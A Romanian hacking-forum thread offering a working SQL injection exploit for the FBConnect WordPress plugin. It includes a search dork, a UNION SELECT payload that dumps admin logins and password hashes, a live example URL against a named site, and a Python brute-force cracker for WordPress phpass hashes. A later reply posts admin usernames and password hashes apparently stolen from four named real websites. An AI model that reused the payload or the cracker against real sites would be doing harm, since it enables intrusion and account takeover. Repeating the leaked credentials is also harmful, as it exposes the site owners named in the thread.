Jump to content
x3uz

[SQL] Wordpress Sql Injection FBConnect

Recommended Posts

Posted (edited)

Wordpress Sql Injection

App : FBConnect WordPress Plugin

Type : Sql-Injection

Dork : inurl:"fbconnect_action=myhome"

Exploit :

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--

PoC :

www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--

Exemple:

http://www.ariesdubs.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29kiddevilz,7,8,9,10,11,12+from+wp_users--

ok when you have the hash, md5 and enccode64() you can test a bruteforce whit this (python):

# code by : tdxev
# website : www.tdxev.com
# team : www.insecurity.ro
# version : 2011.01.17
# documentation : /wp-includes/class-phpass.php

import md5
import time



# user settings

wpHashList = ["$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340"] # list of wordpress hashs #$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340 = tdxev
charSet = 'abcdefghijklmnopqrstuvwxyz0123456789_-' # the character set that the script will use
dumpFile = '/tmp/wp_crack_result.txt' # the file where the script will dump the result for each hash
progFile = '/tmp/wp_crack_progress.txt' # the file where the script will keep track of progress made
# app settings
itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

# use by crypt_private
def encode64 (textInput,count):
output = ''
i = 0
while i < count :
i = i + 1
value = ord(textInput[i-1])
output = output + itoa64[value & 63]
if i < count :
value = value | ord(textInput[i]) << 8
output = output + itoa64[(value >> 6) & 63]
i = i + 1
if i >= count:
break
if i < count:
value = value | ord(textInput[i]) <<16
output = output + itoa64[(value >> 12) & 63]
i = i + 1
if i >= count:
break
output = output + itoa64[(value >> 18) & 63]

return output

# generate wordpress hash
def crypt_private (plainText, wordpressHash):
output = '*0' # old type | not suported yet
if wordpressHash[0:2] == output:
output = '*1'
if wordpressHash[0:3] != '$P$': # old type | not suported yet
return output
count_log2 = itoa64.find(wordpressHash[3]) # get who many times will generate the hash
if (count_log2 < 7) or (count_log2>30):
return output
count = 1 << count_log2 # get who many times will generate the hash
salt = wordpressHash[4:12] # get salt from the wordpress hash
if len(salt) != 8 :
return output
plainTextHash = md5.new(str(salt)+str(plainText)).digest() # generate the first hash from salt and word to try
for i in range (count):
plainTextHash = md5.new(str(plainTextHash)+str(plainText)).digest() # regenerate de hash
output = wordpressHash[0:12] # get the first part of the wordpress hash (type,count,salt)
output = output + encode64(plainTextHash,16) # create the new hash
return output


# class that generate the words
class wordGenerator ():

def __init__(self, word, charSet):
self.setCurretWord(word) # word to start
self.setCharSet(charSet) # characther set used to generate the words

# set current word
def setCurretWord (self, word):
self.currentWord = word

# set the character set that will be used
def setCharSet (self, charSet):
self.charSet = charSet

# generate the next word set that word as currentWord and retutn the word
def nextWord (self):
self.setCurretWord( self._incWord(self.currentWord) )
return self.currentWord

# generate the next word
def _incWord(self, word):
word = str(word) # convert to string

if word == '': # if word is empty
return self.charSet[0] # return first char from the char set
wordLastChar = word[len(word)-1] # get the last char
wordLeftSide = word[0:len(word)-1] # get word without the last char
lastCharPos = self.charSet.find(wordLastChar) # get position of last char in the char set

if (lastCharPos+1) < len(self.charSet): # if position of last char is not at the end of the char set
wordLastChar = self.charSet[lastCharPos+1] # get next char from the char set

else: # it is the last char
wordLastChar = self.charSet[0] # reset last chat to have first character from the char set
wordLeftSide = self._incWord(wordLeftSide) # send left site to be increased

return wordLeftSide + wordLastChar # return the next word


# check if is right type of hashs
for wpHash in wpHashList:
if wpHash[0:3] != '$P$':
print "Wrong password type or password type is DES not impemented yet!"
exit()

# create a new wordGenerator
newWord = wordGenerator ('',charSet); # word generator
wordsFound = 0
exitLoop = False

def found(hashItem, word):
global wordsFound
global exitLoop

d = open(dumpFile,'a') # open file for append
d.write(hashItem + ' = ' + word +"\n") # write the result
d.close() # close file

wordsFound = wordsFound + 1 # increase the number of hashs cracked
print hashItem + ' = ' + word # display the word
if wordsFound == len(wpHashList): # if the number of hash cracked is equal with number of hashs in the list
exitLoop = True # rise flag to stop the loop and exit

def setProgress(word) :
d = open(progFile,'w') # open file for append
d.write("Position :"+ word +"\n") # write the current word
d.close() # close file


count = 0
while exitLoop == False:
word = newWord.nextWord()
count = count + 1
#print word
for wpHash in wpHashList:
newHash = crypt_private(word,wpHash)
if wpHash == newHash :
found(newHash,word)
if count == 1000 :
count = 0
setProgress(word)

H4ve fun :D:D:D

Edited by x3uz
Posted

@redcoder inca nu ti-ai dat seama ca acum se posteaza ampulea?Unii posteaza sa se afle in treaba chiar daca sunt total pe dinafara cu totul.Pun pariu ca MR.KYKY habar nu are ce e un dork sau cum se foloseste.Nici daca ii dai scriptul compilat si facut in GUI habar nu are ce sa faca cu el.

Nu mai postati fratilor de dragul de a posta pentru ca e egal cu zero.Macar sa aveti de 10 ori mai putine posturi dar cu ceva util si nu porcarii.Toate topicuril cu salut si bine ai venit au mai multe replyuri decat oricare altele.

Macar uitati-va in p**a mea la ce posteaza Nytro si invatati ceva.La topicurile lui nu am vazut nici un reply sau foarte rar.

Posted (edited)

@tunet magic, sincer, mi se pare ok ca nu-s raspunsuri prea multe la topicurile lui nytro. Ar fi absurd sa vezi toti copiii cum comenteaza "asa e, e bun tutorialul" sau "ai dreptate, chiar merge". =)) Plus de asta, nu cred ca majoritatea (copiilor) inteleg engleza cat sa se descurce cu un tutorial... se descurca la metin, la CS, ls tampenii, dar la un tutorial, daca se poate tradus in romana si cu poze cat mai multe. :))

Scuze de off-topic, dar nu m-am putut abtine. Apropo, misto SQLi-ul, n-am apucat inca sa-l testez, dar cred ca-mi fac timp maine. :)

Edited by hammerfall
SQLi nu XSS... oboseala... :p
Posted (edited)

redcoder am facut manual !

Edit :

MagicThunder si daca iti zic ca am habar de drok , de xss , perl , c++ , python , visual basic 2006-2008 etc... . Te rog alta data abtinete si mai ales cu limbajul . Totusi suntem pe un forum unde nu se face offtopic aiurea , ok ?Multumesc

Pentru tine MagicThunder :

http://www.361.ro

user : admin

pass : $P$Bsd11lSuD.d98wyQmwbIaZi5dN4aZf0

http://euwarez.org

user : admin

pass : $P$BaaVNlm6KQV71aTfTuYlwScosReC/F/

http://constantin.ghioc.ro/blog

user : admin

pass : P$B1YRdg96hVhlFxzBDAFNO3Hz3BboMt.

http://www.solutionhacker.com

user : poderul

pass : $P$BNWmW1qF9idDUgkHLJy0wslqD4SLKp.

Edited by Mr.KyKy

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...